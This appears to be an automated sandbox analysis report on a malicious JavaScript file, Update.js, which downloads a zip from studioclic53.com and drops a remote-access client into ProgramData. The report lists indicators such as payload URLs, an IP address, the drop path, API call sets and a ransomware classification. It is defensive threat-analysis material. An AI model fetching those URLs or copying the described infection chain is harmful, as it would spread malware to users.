Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
Source: wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
Source: wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
Source: wscript.exe, 00000000.00000003.1937556791.00000291BB55E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jquery/jquery/pull/764
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jsperf.com/try-catch-performance-overhead
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://momentjs.com/
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-48
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-54
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-57
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-59
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-61
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-64
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-75
Source: wscript.exe, 00000000.00000003.1936184278.00000291B3E0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://studioclic53.com/
Source: wscript.exe, 00000000.00000003.1832699782.00000291B79A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://studioclic53.com/work/fix2.php?5436
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://studioclic53.com/work/yyy.zip?5668
Source: wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
Source: wscript.exe, 00000000.00000003.1937556791.00000291BB55E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: wscript.exe, 00000000.00000003.1937556791.00000291BB55E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 79.141.173.158:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

4_2_1101FC20

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,	4_2_110335A0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	4_2_1101FC20
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110335A0 GetClipboardFormatNameA,SetClipboardData,	5_2_110335A0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	5_2_1101FC20

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,

4_2_11033320

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

4_2_110077A0

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		4_2_11114590
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		5_2_11114590

Source: Yara match	File source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3112145975.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\o2xqxqs\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		4_2_111165C0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		5_2_111165C0

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

Process Stats: CPU usage > 49%

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,

4_2_11113190

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

4_2_1115EA00

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1102D9CA Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D9CA
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102DD21
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	5_2_1102D9F4
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	5_2_1102DD21

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110627B0	4_2_110627B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11073680	4_2_11073680
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110336D0	4_2_110336D0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1115F840	4_2_1115F840
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11029BB0	4_2_11029BB0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1101BCD0	4_2_1101BCD0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11045E70	4_2_11045E70
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1101C110	4_2_1101C110
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111640E0	4_2_111640E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11168345	4_2_11168345
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111265B0	4_2_111265B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11070430	4_2_11070430
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11080740	4_2_11080740
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1100892B	4_2_1100892B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1101CF30	4_2_1101CF30
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F8A6E18	4_2_6F8A6E18
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F846E24	4_2_6F846E24
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F846E28	4_2_6F846E28
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F87EB1A	4_2_6F87EB1A
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F8C0915	4_2_6F8C0915
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F860919	4_2_6F860919
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F8D67FF	4_2_6F8D67FF
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F8AE7F1	4_2_6F8AE7F1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F8545AE	4_2_6F8545AE
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F848468	4_2_6F848468
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F84839B	4_2_6F84839B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F84828B	4_2_6F84828B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11073680	5_2_11073680
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11029BB0	5_2_11029BB0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110627B0	5_2_110627B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110336D0	5_2_110336D0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11051800	5_2_11051800
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1115F840	5_2_1115F840
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1101BCD0	5_2_1101BCD0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11087F50	5_2_11087F50
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11045E70	5_2_11045E70
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1101C110	5_2_1101C110
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111640E0	5_2_111640E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11168345	5_2_11168345
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111265B0	5_2_111265B0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11070430	5_2_11070430
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11080740	5_2_11080740
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1100892B	5_2_1100892B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1101CF30	5_2_1101CF30
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C64A980	5_2_6C64A980
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C674910	5_2_6C674910
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C6584F0	5_2_6C6584F0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C674528	5_2_6C674528
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C67A063	5_2_6C67A063
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C674156	5_2_6C674156
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C6643C0	5_2_6C6643C0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C673DB8	5_2_6C673DB8
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C673923	5_2_6C673923
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C64DBA0	5_2_6C64DBA0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C641760	5_2_6C641760
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C641310	5_2_6C641310

Source: Joe Sandbox View

Dropped File: C:\ProgramData\o2xqxqs\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11164ED0 appears 60 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 110B7EF0 appears 43 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C66F3CB appears 33 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 1105E820 appears 551 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6F840950 appears 70 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 1105E950 appears 51 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 111744C6 appears 40 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C657D00 appears 135 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11143BD0 appears 32 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11029A70 appears 1953 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11161299 appears 81 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11027F40 appears 91 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11147060 appears 1080 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C646F50 appears 171 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11147AD0 appears 38 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C657A90 appears 62 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C6430A0 appears 54 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 11081E70 appears 84 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 1109DCE0 appears 32 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 1116FED0 appears 74 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C669480 appears 60 times
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: String function: 6C657C70 appears 36 times

Source: Update.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.rans.evad.winJS@4/28@2/3

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_1105A760 GetLastError,FormatMessageA,LocalFree,

4_2_1105A760

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	4_2_1109D860
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,	4_2_1109D8F0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	5_2_1109D860
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,	5_2_1109D8F0

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11045E70 LoadLibraryA,CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,CoCreateInstance,VariantClear,_wcschr,_wcschr,_wcschr,_wcschr,SysFreeString,StringFromGUID2,_strncmp,SysFreeString,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CoUninitialize,FreeLibrary,

4_2_11045E70

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11089430 FindResourceA,LoadResource,LockResource,

4_2_11089430

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

4_2_11128B10

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yyy[1].zip

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\ProgramData\o2xqxqs\temp\quit_2.ico

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Source: unknown	Process created: C:\ProgramData\o2xqxqs\client32.exe "C:\ProgramData\o2xqxqs\client32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\o2xqxqs\client32.exe "C:\ProgramData\o2xqxqs\client32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\o2xqxqs\client32.exe "C:\ProgramData\o2xqxqs\client32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shdocvw.dll	Jump to behavior
